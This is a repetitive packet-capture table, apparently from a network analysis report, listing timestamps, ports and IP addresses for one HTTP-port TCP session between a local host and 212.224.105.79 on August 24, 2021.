Aug 24, 2021 08:46:53.548453093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.548502922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.548762083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.549145937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.549176931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.549220085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.553195953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.561893940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.561933994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.561958075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.561985016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.562084913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.563991070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564039946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564064980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564088106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564111948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564136028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564162970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564188004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.564259052 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.564327002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570471048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570504904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570527077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570545912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570569038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570590019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570593119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570610046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570631981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570641041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570652962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570667028 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570674896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570694923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570714951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570732117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570749044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570755959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570766926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570789099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570808887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570825100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570846081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570866108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570885897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570907116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570928097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570930004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.570949078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570974112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.570997953 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571019888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571019888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571043968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571067095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571074963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571086884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571098089 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571109056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571139097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571157932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571181059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571208000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571216106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571248055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571259975 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571271896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571310997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571314096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571335077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571358919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571372986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571382999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571403980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571423054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.571424007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.571461916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.575289011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.576060057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.584224939 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.584274054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.584306002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.584336042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.584341049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.584389925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.586296082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586338043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586361885 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586381912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586400986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586402893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.586421013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586427927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.586440086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586458921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.586483955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.586519003 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.587627888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593434095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593496084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593522072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593540907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593547106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593570948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593574047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593610048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593621016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593632936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593686104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593698025 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593709946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593733072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593755007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593755960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593781948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593805075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593806982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593832016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593857050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593858004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593904018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593905926 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593928099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593950987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593971968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.593972921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.593997955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594022989 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594022989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594048977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594070911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594073057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594115019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594122887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594139099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594161987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594183922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594185114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594208956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594229937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594232082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594259024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594275951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594281912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594305992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594329119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594330072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594352961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594374895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594377995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594398975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594419956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594427109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594449997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594482899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.594490051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.594537020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.600234032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.600286007 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.600311041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.600338936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.600377083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.600418091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.606411934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.606443882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.606534004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.608575106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608617067 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608640909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608664036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608683109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.608689070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608711958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608732939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.608735085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608756065 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.608758926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.608804941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.609596968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616552114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616596937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616641998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616667032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616689920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616713047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616736889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616739988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616760969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616787910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616787910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616811991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616835117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616835117 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616858959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616874933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616882086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616904974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616925001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616929054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616950035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.616951942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616977930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.616987944 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617002010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617023945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617047071 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617050886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617069960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617093086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617100000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617115974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617140055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617140055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617165089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617185116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617189884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617214918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617238045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617238045 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617260933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617285013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617286921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617307901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617330074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617330074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617352009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617372990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617377043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617393970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617414951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617423058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617444992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617468119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617469072 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617489100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617510080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617512941 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617530107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617549896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.617558002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.617587090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.622556925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.622601986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.622625113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.622647047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.622723103 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.622760057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.630825996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.630928993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.630949974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.630970955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.630987883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.631005049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.631021023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.631028891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.631037951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.631067038 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.631131887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.632416010 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.639664888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639691114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639708996 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639727116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639743090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639759064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639775038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639794111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639811993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639820099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.639827967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639843941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639854908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.639861107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639883041 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.639887094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639899969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639915943 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639931917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639949083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.639978886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640022993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640032053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640048027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640064001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640080929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640084982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640098095 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640116930 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640125990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640134096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640150070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640166044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640167952 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640182018 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640197039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640203953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640213013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640228987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640234947 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640247107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640264034 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640264988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640280008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640295982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640297890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640311956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640325069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640326977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640342951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640357018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640358925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640377045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640383959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640393972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640409946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640412092 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640425920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640441895 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640456915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.640456915 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.640506029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.644865990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.644897938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.644913912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.645313978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.653085947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653110981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653127909 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653161049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653177023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.653192043 CEST	80	49715	212.224.105.79	192.168.2.7
